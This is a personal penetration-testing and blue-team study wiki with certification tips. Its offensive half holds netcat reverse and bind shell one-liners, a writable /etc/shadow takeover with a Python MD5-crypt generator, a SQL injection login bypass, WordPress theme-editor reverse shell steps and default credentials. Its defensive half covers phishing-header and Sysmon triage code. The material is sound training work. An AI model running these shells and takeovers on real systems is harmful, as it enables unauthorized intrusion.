
C3 Wiki


Red

Discovery/Enumeration

Directory

Protocol Enumeration

System Info Enumeration

Connecting to Services

  • SMB - smbclient -L 192.168.0.1 - List shares
  • SMB (Connect to share) - smbclient //192.168.0.1/share -U user
    • Guest login: -U Guest with an empty password (or -N to skip the password prompt)
  • SQL - mysql -h 192.168.0.1 -u username -ppassword database (no space between -p and the password)
  • Netcat
    • -l = listen
    • -p = LOCAL port (for listeners/reverse shells)
    • -n = no DNS lookup
    • -v = verbose
    • -u = UDP
    • -e = execute a program once connected (not in every netcat build; OpenBSD nc has no -e)
    • Bind shell (run on victim): nc.exe -lnvp PORT -e cmd.exe
    • Bind shell (run on attacker): nc 192.168.0.1 PORT
    • Reverse shell (run on attacker): nc -lvnp PORT
    • Reverse shell (run on victim): nc ATTACKER_IP PORT -e /bin/bash
  • RDP - xfreerdp /u:username /p:password /v:192.168.0.1:PORT
  • FTP - ftp 192.168.0.1 port (prompts for the username, then for the password)
    • Anonymous login: U: anonymous P: (none, just press enter)
  • SSH - ssh user@192.168.0.1 OR ssh -i key_file user@192.168.0.1
  • Telnet - telnet 192.168.0.1 PORT

Other Helpful Commands

  • ip a | grep inet - Your machine's IPs (Linux)
  • ip a | grep eth1 - Addresses on eth1 (outward-facing interface)
  • ipconfig /all | findstr /i ipv4 - Your machine's IP (Windows only)
  • python -c 'import pty;pty.spawn("/bin/bash")' - Upgrade a dumb shell to a PTY (stable shell)
  • /bin/bash -i - Interactive bash shell
  • sudo -l - Show which commands the current user may run through sudo (as root or as other users)
  • chmod ### file - 1st digit = owner permissions, 2nd = group permissions, 3rd = "world" (everyone else). Each digit is the sum of 4 (read), 2 (write) and 1 (execute); 7 = all three
    • chmod +r/+w/+x file - Make file readable/writeable/executable
    • chmod 777 file - Everyone can read, write and execute the file
    • chmod +t file - Set sticky bit
  • openssl passwd -1 -salt abc password - Generate an MD5-crypt ($1$) hash for "password" that can be written into /etc/shadow (or /etc/passwd) when the file is writable because of weak permissions
  • SQL Commands
    • mysql -u username -ppassword -e "See below for commands" - Run a SQL statement non-interactively; add -h HOST for a remote server
    • mysql -u username -ppassword -D database_name -e "See below for commands" - Same, with the database pre-selected (-D / --database)
    • show databases; - List databases
    • use database_name; - Select database
    • show tables; - Show tables within selected database
    • select * from table_name; - Select all rows from table
    • The above commands can be combined, as such: use database_name; select * from table_name;
  • PowerShell
    • Searching recursively for file name: Get-ChildItem -Path C:\ -Include *FILENAME.EXT* -File -Recurse -ErrorAction SilentlyContinue
    • MD5Sum equivalent: Get-FileHash -Algorithm MD5 -Path FILENAME.EXT
    • List network connections: Get-NetTCPConnection
  • /etc/hosts - Local host resolution file, can be edited/viewed with cat/vim/nano

Other Helpful Knowledge

Initiating connections

  • Bind shell - Attacker → Target (Target must be running a listener, call is made from the attacker)
  • Reverse shell - Target → Attacker (Attacker must be running a listener, call is made from the target)

Common exploitable ports

  • 1524 - Ingreslock (UNIX) Connect via netcat
  • 139/445 - SMB (Enumerate shares, brute force users/passwords, try anonymous/guest logins, check for EternalBlue (Windows SMBv1 without the MS17-010 patch))
  • 5985/5986 - winrm

Common Unix password hash types (/etc/shadow)

  • $1$ - MD5-crypt
  • $2$, $2a$, $2b$, $2y$ - bcrypt (Blowfish)
  • $5$ - SHA-256-crypt
  • $6$ - SHA-512-crypt
  • $y$ - yescrypt (the default on recent Debian, Ubuntu and Fedora)
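A helper that tells the prefixes in this table apart from a raw /etc/shadow line, together with a pure-Python port of the MD5-crypt algorithm that the openssl passwd -1 command above computes. This is an added example, not code from the wiki or from OpenSSL: md5crypt("password", "abc") yields the same hash as `openssl passwd -1 -salt abc password`, and the shadow lines used below are constructed (the hash bodies in them are placeholders, not real hashes).

```python
"""Identify /etc/shadow hash types and reproduce `openssl passwd -1`.

Added example for this page, not code from the original wiki or from
OpenSSL. md5crypt() is a port of the classic FreeBSD MD5-crypt routine,
the same algorithm `openssl passwd -1` and glibc use for `$1$` hashes.
"""
import hashlib
import hmac

# Prefixes from the page's table plus the ones modern glibc adds.
HASH_TYPES = {
    "1": "MD5-crypt",
    "2": "bcrypt (Blowfish)", "2a": "bcrypt (Blowfish)",
    "2b": "bcrypt (Blowfish)", "2y": "bcrypt (Blowfish)",
    "5": "SHA-256-crypt",
    "6": "SHA-512-crypt",
    "y": "yescrypt",
}

# The crypt(3) base-64 alphabet (not the RFC 4648 one).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def identify(shadow_line):
    """Return (user, algorithm name) for one line of /etc/shadow."""
    user, field = shadow_line.split(":")[:2]
    if field == "":
        return user, "empty password"
    if field.startswith(("!", "*")):
        return user, "locked / no password login"
    if not field.startswith("$"):
        return user, "traditional DES-crypt"
    ident = field.split("$")[1]          # "$6$salt$hash" -> "6"
    return user, HASH_TYPES.get(ident, f"unknown (${ident}$)")


def _to64(value, count):
    """Emit `count` base-64 digits, least significant 6 bits first."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password, salt, magic="$1$"):
    """MD5-crypt: `$1$<salt up to 8 chars>$<22 chars>`."""
    pw = password.encode()
    if salt.startswith(magic):            # accept a full hash as the salt source
        salt = salt[len(magic):]
    salt = salt.split("$", 1)[0][:8]
    sp = salt.encode()

    ctx = hashlib.md5(pw + magic.encode() + sp)
    alt = hashlib.md5(pw + sp + pw).digest()
    pl = len(pw)
    while pl > 0:                          # mix in alt, 16 bytes per 16 bytes of password
        ctx.update(alt[:min(pl, 16)])
        pl -= 16
    i = len(pw)
    while i:                               # one byte per bit of the password length
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    for i in range(1000):                  # fixed 1000-round stretching loop
        ctx1 = hashlib.md5()
        ctx1.update(pw if i & 1 else final)
        if i % 3:
            ctx1.update(sp)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()

    # The digest bytes are interleaved before encoding, a quirk of the original.
    out = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        out += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    out += _to64(final[11], 2)
    return magic + salt + "$" + out


def verify_md5crypt(password, shadow_hash):
    """Recompute with the salt embedded in the hash and compare in constant time."""
    return hmac.compare_digest(md5crypt(password, shadow_hash), shadow_hash)


# Reference vector from the FreeBSD implementation:
# md5crypt("Hello world!", "saltstring") -> $1$saltstri$YMyguxXMBpd2TEZ.vS/3q1
```

To exploit a writable /etc/shadow as the command above describes, replace the second field of the target user's line with the md5crypt() output; $1$ is still accepted by glibc even on systems that default to $6$ or $y$, which is why the MD5 variant keeps turning up in lab write-ups.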

XSS (Cross-Site Scripting) / SQL Injection

SQL Injection example:

<string>
Input to start the value; any normal characters will do, it only has to land inside the quoted string the application builds its query around
'
A single quote closes that string literal, so everything after it is parsed as SQL rather than as data
OR 1=1
A condition that is always true, so the WHERE clause matches every row
--
Starts an SQL comment, so the rest of the original query (e.g. the AND password = '...' check) is ignored. MySQL needs a space after the -- ; # also starts a comment there
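The payload above run against a login check that splices the input into the SQL text, beside the parameterized version that defeats it. This is an added example, not code from the original wiki: it uses an in-memory SQLite database with a constructed users table (names and passwords made up), and the login_vulnerable / login_safe functions are hypothetical stand-ins for an application's login routine. With the payload, the vulnerable query becomes SELECT username FROM users WHERE username = '' OR 1=1 -- ' AND password = '...', which matches every row.

```python
"""String-built SQL beside its parameterized fix, driven by the page's payload.

Added example for this page, not code from the original wiki. The users
table and its contents are constructed for illustration.
"""
import sqlite3

# The page's payload: <string> ' OR 1=1 --  (trailing space matters on MySQL)
PAYLOAD = "' OR 1=1 -- "


def make_db():
    """In-memory SQLite database with a constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "hunter2"), ("bob", "s3cret"), ("admin", "correct-horse")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by concatenation: user input becomes part of the SQL."""
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, username, password):
    """Bound parameters: the driver sends values separately, never as SQL text."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload as username:", login_vulnerable(db, PAYLOAD, "x"))
    print("vulnerable, comment out password:", login_vulnerable(db, "admin' -- ", "x"))
    print("parameterized, same payload:     ", login_safe(db, PAYLOAD, "x"))
```

The fix is the bound parameters, not escaping the quote: the value travels out of band, so the database never parses it as SQL. The second vulnerable call shows the other common use of the comment, logging in as a chosen user by cutting off the password check entirely.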

Command injection payload list

DNS

  • A - Hostname → IPv4
  • AAAA - Hostname/Domain → IPv6
  • NS - Domain → Nameserver
  • MX - Domain → Mailserver
  • CNAME - Alias hostname → canonical hostname
  • TXT - Text Record
  • HINFO - Host Information
  • SOA - Start of Authority (Domain Authority)
  • SRV - Service Records
  • PTR - IP → Hostname

Content Management Systems (CMS)

  • Drupal
    • Drupalgeddon
  • WordPress
    • WPScan (scanner that enumerates version, plugins, themes and users and reports known vulnerabilities; can also brute force logins)
    • WordPress reverse shell
      1. Gain access to the admin panel (enumerate users with WPScan, then brute force or use credentials found elsewhere)
      2. Appearance → Theme File Editor → 404.php
      3. Replace the content of 404.php with a reverse shell. Make sure the shell matches the OS of the WordPress host, and change the variables inside the shell code (your IP, your listening port) → Update File
      4. Start a netcat listener (nc -lvnp PORT), or use multi/handler in msfconsole to catch the connection from the target
      5. Trigger 404.php by requesting it in the browser. Note the target's active theme; the path is http://TARGET:PORT/wordpress/wp-content/themes/THEMENAME/404.php
      6. If needed, you can (possibly) reach the SQL database on the server
        • Open wp-config.php; the database credentials are defined there (DB_USER, DB_PASSWORD, DB_HOST)
        • mysql -u root -pPASSWORD -h 192.168.0.1

Red Team Methodology

1. Reconnaissance
Gather information about the target(s): ports, services, etc. See Protocol Enumeration
2. Initial Access
Use the information gathered to get onto the target(s) through common vulnerabilities/exploits. Metasploit
3. Lateral Movement
Gather information about the internal network and move between hosts. Metasploit
4. Exploitation
Compromise devices, escalate privileges where necessary, extract information. System enumeration. Metasploit

Default logins user/password

  • Jenkins - admin/admin
  • Wordpress - admin/password

Other Helpful Links

EJPT Resources/Tips

  • EJPT Zero to Hero Playlist (OvergrownCarrot): YouTube
  • TryHackMe rooms
  • Test-Taking Tips:
    • SAVE EVERYTHING ON YOUR LOCAL COMPUTER!!! - The eJPT crashed 4 times for me; it doesn't save so much as a text file and you will lose all files/changes made in the lab environment
    • Don't fall down rabbit holes! If something is starting to take longer than 20-30 minutes, take a look at something else and maybe come back to it later
    • Organize your scan results and notes. I personally organized it by host so that all my information per host was in one place
    • There are typically multiple ways to do things. If you're better at using one tool to enumerate, go for it. If you know one exploitation method better than another, use it
    • This website contains most of what you need to know about the tools/methods you can use in the lab

Blue

Phishing Tools/Info

Tools

Info

Parts of an Email

  • Header
    • From - Shows the sender's (claimed) email address
    • To - Shows the recipient's email address
    • Date - Shows the date the email was sent
    • Received - One line per intermediary server, each prepended by the hop that added it, with the date the message was processed there (read them bottom-up for the path from origin to you)
    • Reply-To - Shows the address replies go to; compare it with From
    • Subject - Shows the subject
    • Message-ID - Shows a unique identification for the message
    • Disclaimer: There are also other fields that may be present, such as 'X-' fields, which may include helpful fields such as "X-DestIP"
  • Body
    • The message itself, separated from the header by a blank line
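Pulling those header fields out of a raw message for triage, using the standard library's email parser. This is an added example, not code from the original wiki: the message is constructed (every address, host and IP in it is made up) and is written so that the From and Reply-To domains disagree, the lure pattern the Reply-To line above warns about.

```python
"""Extract the triage-relevant headers from a raw e-mail.

Added example for this page, not code from the original wiki. SAMPLE is
a constructed message; all addresses, hosts and IPs in it are made up.
"""
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr

# Constructed sample: the visible From domain and the Reply-To domain differ,
# and the Message-ID was minted on a host outside the From domain.
SAMPLE = b"""Received: from mx1.example.net (mx1.example.net [198.51.100.7])
\tby mail.example.com with ESMTP id 4XyZ12; Mon, 1 Jan 2024 10:00:02 +0000
Received: from relay.example.org (unknown [203.0.113.9])
\tby mx1.example.net with ESMTP; Mon, 1 Jan 2024 09:59:58 +0000
From: "IT Helpdesk" <helpdesk@example.com>
Reply-To: helpdesk-reset@example.org
To: alice@example.com
Subject: Your password expires today
Date: Mon, 1 Jan 2024 09:59:50 +0000
Message-ID: <20240101095950.1234@relay.example.org>
Content-Type: text/plain; charset=utf-8

Reset your password here: http://example.org/reset
"""


def domain_of(header_value):
    """Domain part of the first address in a From/Reply-To style header."""
    _, addr = parseaddr(str(header_value or ""))
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def received_chain(msg):
    """Each MTA prepends its own Received line, so reading top-down runs from
    the last hop back to the origin. Reverse so index 0 is the first hop."""
    hops = msg.get_all("Received") or []
    return [" ".join(str(h).split()) for h in reversed(hops)]


def triage(raw):
    """Return the fields an analyst checks first, plus simple findings."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    from_domain = domain_of(msg["From"])
    reply_domain = domain_of(msg["Reply-To"])
    message_id = str(msg["Message-ID"] or "").strip().strip("<>")
    msgid_domain = message_id.rsplit("@", 1)[-1].lower() if "@" in message_id else ""

    findings = []
    if reply_domain and reply_domain != from_domain:
        findings.append(f"Reply-To domain {reply_domain} differs from From domain {from_domain}")
    if msgid_domain and from_domain and not msgid_domain.endswith(from_domain):
        findings.append(f"Message-ID domain {msgid_domain} is outside From domain {from_domain}")

    return {
        "from_domain": from_domain,
        "reply_to_domain": reply_domain,
        "message_id_domain": msgid_domain,
        "subject": str(msg["Subject"] or ""),
        "received": received_chain(msg),   # origin first
        "findings": findings,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

Only the Received line added by your own mail server can be trusted; anything below it was written by the sender's side and may be forged, which is why the origin hop (index 0 here) is a lead to verify, not a fact. The Message-ID check is likewise a prompt to look closer: plenty of legitimate senders mint IDs on a third-party host.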

Windows Event Logs

  • System logs: Records events associated with Operating System components
    • Hardware changes
    • Device drivers
    • System changes
  • Security logs: Records events connected to logon and logoff activities and other audited security events
  • Application logs: Records events generated by the applications installed on the system (their own errors, warnings and informational messages)
  • Directory Service Events: Active Directory changes and activities, mainly on domain controllers
  • File Replication Service Events: Records events associated with Windows Servers during the sharing of Group Policies and logon scripts to domain controllers
  • DNS Event Logs: DNS servers use these logs to record domain events and name-resolution activity
  • Custom Logs: Events logged by applications that require custom data storage. This allows applications to control the log size or attach other parameters (such as access control lists)
  • Event log types

    • Error: Event that indicates a significant problem such as loss of data or loss of functionality
    • Warning: Event that is not necessarily significant, but may indicate future problems (e.g. low disk space)
    • Information: Event that describes the successful operation of an application, driver, or service
    • Success Audit: Event that records an audited security access attempt that succeeds (e.g. a successful logon)
    • Failure Audit: Event that records an audited security access attempt that fails (e.g. a user tries to access a network drive and is denied)

Accessing Event Logs

  • Event Viewer (GUI): Launch with eventvwr.msc
  • Wevtutil.exe (CLI tool): wevtutil.exe /?
  • Get-WinEvent (Powershell CMDlet): Get-WinEvent Documentation

Sysmon

Installation and running

  • PowerShell download helper (a lab-provided function, not a built-in cmdlet; elsewhere fetch Sysmon from the Sysinternals site): Download-SysInternalsTools C:\Sysinternals
  • Run sysmon: Sysmon.exe -accepteula -i configfile.xml
  • Event viewer sysmon event log: Applications and Services Logs/Microsoft/Windows/Sysmon/Operational

Sysmon Event IDs

  • 1: Process Creation
  • 3: Network Connection
  • 7: Image Loaded
  • 8: CreateRemoteThread
  • 11: File Created
  • 12/13/14: Registry Event
  • 15: FileCreateStreamHash
  • 22: DNS Event
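Working with those event IDs outside Event Viewer: a parser for Sysmon events exported as XML (the shape the Event Viewer XML view and wevtutil produce), with two simple detections on top, an Office application spawning a shell (ID 1) and a remote thread created in lsass.exe (ID 8). This is an added example, not code from the original wiki or from Sysinternals; the three events are constructed samples with made-up hostnames, paths and users, and the detection rules are illustrative, not a complete ruleset.

```python
"""Parse exported Sysmon XML and flag two classic patterns.

Added example for this page, not code from the original wiki or from
Sysinternals. SAMPLE_XML holds three constructed events in the layout the
Event Viewer XML view / `wevtutil qe ... /f:xml` emit; all names are made up.
"""
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Sysmon event IDs listed on this page.
EVENT_NAMES = {
    1: "Process Creation", 3: "Network Connection", 7: "Image Loaded",
    8: "CreateRemoteThread", 11: "File Created", 12: "Registry Event",
    13: "Registry Event", 14: "Registry Event", 15: "FileCreateStreamHash",
    22: "DNS Event",
}

OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")

SAMPLE_XML = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Sysmon"/>
    <EventID>1</EventID>
    <TimeCreated SystemTime="2024-01-01T10:00:00.000Z"/>
    <Computer>ws01.example.local</Computer>
  </System>
  <EventData>
    <Data Name="Image">C:\Windows\System32\cmd.exe</Data>
    <Data Name="CommandLine">cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA</Data>
    <Data Name="ParentImage">C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE</Data>
    <Data Name="User">EXAMPLE\alice</Data>
  </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Sysmon"/>
    <EventID>8</EventID>
    <TimeCreated SystemTime="2024-01-01T10:00:05.000Z"/>
    <Computer>ws01.example.local</Computer>
  </System>
  <EventData>
    <Data Name="SourceImage">C:\Users\alice\AppData\Local\Temp\update.exe</Data>
    <Data Name="TargetImage">C:\Windows\System32\lsass.exe</Data>
  </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Sysmon"/>
    <EventID>22</EventID>
    <TimeCreated SystemTime="2024-01-01T10:00:09.000Z"/>
    <Computer>ws01.example.local</Computer>
  </System>
  <EventData>
    <Data Name="QueryName">login.example.net</Data>
    <Data Name="Image">C:\Program Files\Google\Chrome\Application\chrome.exe</Data>
  </EventData>
</Event>
</Events>"""


def _basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(xml_text):
    """Turn exported Sysmon XML into dicts; EventData fields keyed by their Name."""
    root = ET.fromstring(xml_text)
    events = []
    for ev in root.iter(NS + "Event"):
        system = ev.find(NS + "System")
        event_id = int(system.findtext(NS + "EventID"))
        data = {d.get("Name"): (d.text or "") for d in ev.iter(NS + "Data")}
        events.append({
            "id": event_id,
            "name": EVENT_NAMES.get(event_id, "Other"),
            "time": system.find(NS + "TimeCreated").get("SystemTime"),
            "computer": system.findtext(NS + "Computer"),
            "data": data,
        })
    return events


def detect(event):
    """Return a finding for the patterns we care about, else None."""
    d = event["data"]
    if event["id"] == 1:
        parent, child = _basename(d.get("ParentImage", "")), _basename(d.get("Image", ""))
        if parent in OFFICE_APPS and child in SHELLS:
            return f"Office app {parent} spawned {child}: {d.get('CommandLine', '')}"
    if event["id"] == 8 and _basename(d.get("TargetImage", "")) == "lsass.exe":
        return f"Remote thread injected into lsass.exe by {d.get('SourceImage', '')}"
    return None


def triage(xml_text):
    """(event id, event name, finding or None) per event, in log order."""
    return [(e["id"], e["name"], detect(e)) for e in parse_events(xml_text)]


if __name__ == "__main__":
    for event_id, name, finding in triage(SAMPLE_XML):
        print(f"{event_id:>2} {name:<20} {finding or '-'}")
```

To run this against a real host, export the log with wevtutil qe Microsoft-Windows-Sysmon/Operational /f:xml and wrap the output in a root element as SAMPLE_XML does; the EventData names (Image, ParentImage, TargetImage, QueryName) are the ones Sysmon itself uses.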

Registry Hives

Cheat Sheet (Courtesy of TryHackMe): PDF

Registry Hives

  • Located in C:\Windows\System32\Config
    • DEFAULT - Mounted on HKEY_USERS\DEFAULT
    • SYSTEM - Mounted on HKEY_LOCAL_MACHINE\SYSTEM
    • SECURITY - Mounted on HKEY_LOCAL_MACHINE\SECURITY
    • SOFTWARE - Mounted on HKEY_LOCAL_MACHINE\SOFTWARE
    • SAM - Mounted on HKEY_LOCAL_MACHINE\SAM
      • Transaction log: C:\Windows\System32\Config\SAM.LOG
  • Located in C:\Users\username
    • NTUSER.DAT (HIDDEN FILE) - Mounted on HKEY_CURRENT_USER (when a user logs in)
  • Located in C:\Users\username\AppData\Local\Microsoft\Windows
    • USRCLASS.DAT (HIDDEN FILE) - Mounted on HKEY_CURRENT_USER\Software\Classes
  • Amcache Hive - C:\Windows\AppCompat\Programs\Amcache.hve
  • OS Version - SOFTWARE\Microsoft\Windows NT\CurrentVersion
  • Current control set - HKLM\SYSTEM\CurrentControlSet
    • Other control sets - HKLM\SYSTEM\ControlSet001 (other numbers)
  • Last Known Good - SYSTEM\Select\LastKnownGood
  • Computer Name - SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
  • Time Zone Information - SYSTEM\CurrentControlSet\Control\TimeZoneInformation
  • Network Interfaces (NICs)- SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
  • Past Networks - SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed AND Unmanaged
  • Autostart Programs
    • NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run
    • NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • Services - SYSTEM\CurrentControlSet\Services
  • SAM - SAM\Domains\Account\Users
  • Recent Files - NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
  • Office Recent Files - NTUSER.DAT\Software\Microsoft\Office

Tools

  • KAPE - Live data acquisition and analysis tool to acquire registry data
  • Autopsy - Acquire data from both live systems and/or disk images
  • Regripper - Takes a registry hive as input and outputs a report that extracts data from some of the forensically important keys and values in that hive
  • (EZTools) Registry Explorer - Can load multiple hives and add data from transaction logs into the hive

Other Helpful Commands

  • jq - JSON parser

  • exiftool filename - File Data Analysis Tool
  • scalpel
    1. Copy default configuration file: sudo cp /etc/scalpel/scalpel.conf ./q3.conf
    2. Edit configuration to identify wanted filetypes: nano q3.conf
    3. Run scalpel: scalpel -c q3.conf filename -o outputq3
  • DeepBlueCLI - .\DeepBlueCLI.ps1 .\evtx\EVENTFILENAME.evtx
  • BTL1 Tips

    • The BTL1 test is very simple, don't overthink it. Although you have less time than the eJPT, there are also fewer questions and significantly less to do
    • Get familiar with Splunk, Autopsy, and Wireshark.
      • Splunk - Know basic queries, know your fields, and know where to find your dashboards
      • Autopsy - Know your general locations for important artifacts (File downloads, shellbags, etc.)
      • Wireshark - Know basic queries, general syntax for wireshark is very important for quick and concise searches
    • Make sure you're familiar with Windows file structures! Get in the mind of the attacker, some generic locations where they would "hide" files. BTL1 is intentionally for beginners, they're not trying to trick you or mislead you
    • If you don't know what something is... Google it! There are many red and blue tools that we never ended up using in this course, so if something is unfamiliar to you, look it up
    • Don't fall down a rabbit hole. The eJPT had some rabbit holes here and there deliberately intended to waste your time, BTL1 has artifacts that are what you're looking for, and then some which are literally artifacts of when they were setting up the test, which is just a fault on Security Blue Team